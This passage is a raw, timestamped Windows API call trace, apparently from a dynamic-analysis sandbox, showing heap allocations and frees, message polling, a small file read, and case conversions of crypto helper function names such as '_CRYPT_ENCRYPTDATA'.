out: hHeap=0x1780000) returned 1 [0087.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0087.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.557] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0087.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0087.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0087.558] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0087.558] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0087.558] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0087.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0087.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0087.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e06020 [0087.561] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0087.562] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x1f8, lpOverlapped=0x0) returned 1 [0087.562] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0087.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43e83a0 [0087.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e06020 | out: hHeap=0x1780000) returned 1 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0087.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43e8a88 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e83a0 | out: hHeap=0x1780000) returned 1 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.565] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0087.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43e83a0 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e83a0 | out: hHeap=0x1780000) returned 1 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0087.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.566] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0087.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0087.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0087.566] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0087.566] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0087.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0087.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43e83a0 [0087.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0087.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2b0 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43e8c88 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0087.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0087.568] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0087.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0087.568] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0087.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0087.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0087.568] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0087.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0087.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0087.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0087.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0087.569] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0087.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0087.569] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0087.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.570] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0087.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0087.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0087.571] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0087.571] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0087.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0087.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0087.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0087.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.572] 